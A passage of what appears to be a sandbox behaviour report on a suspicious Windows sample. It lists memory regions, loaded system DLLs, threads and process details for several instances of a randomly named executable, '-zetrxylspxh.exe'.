entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7450 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7451 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7452 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7453 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7454 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7696 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7697 start_va = 0x820000 end_va = 0x9a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 7698 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 245 os_tid = 0x6d4 Thread: id = 263 os_tid = 0x10cc Process: id = "81" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb7f7000" os_pid = "0x102c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6684 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6685 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6686 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6687 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6688 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6689 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6690 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6691 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6692 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6693 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6694 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6695 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6696 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6697 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6698 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6699 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7075 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 7076 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7077 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7078 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7079 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7080 start_va = 0x490000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 7081 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7082 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7083 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7084 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7085 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7086 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7087 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7456 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 7457 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 7458 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7459 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7460 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7461 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7462 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7463 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7464 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7465 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7466 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7467 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7468 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7469 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7470 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7471 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7472 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7473 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7474 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7784 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7785 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7786 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7787 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 7788 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 246 os_tid = 0x13f8 Thread: id = 277 os_tid = 0x13e8 Process: id = "82" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb4fc000" os_pid = "0x103c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6709 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6710 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6711 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6712 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6713 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6714 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6715 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6716 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6717 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 6718 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 6719 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6720 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6721 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6722 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6723 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6724 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 7088 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 7089 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7090 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7091 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7092 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7093 start_va = 0x550000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 7094 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7095 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7096 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7097 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 7098 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7099 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 7100 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 7101 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7102 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 7103 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7475 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7476 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 7477 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 7478 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 7479 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7480 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7481 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7482 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7483 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7484 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7485 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7486 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 7487 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 7488 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 7489 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 7490 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7491 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 7789 start_va = 0x6f370000 end_va = 0x6f401fff monitored = 0 entry_point = 0x6f37dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 7790 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 7791 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 7792 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 247 os_tid = 0x6d8 Thread: id = 266 os_tid = 0x10c4 Process: id = "83" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xb502000" os_pid = "0x108c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6732 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6733 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6734 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6735 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6736 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6737 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" 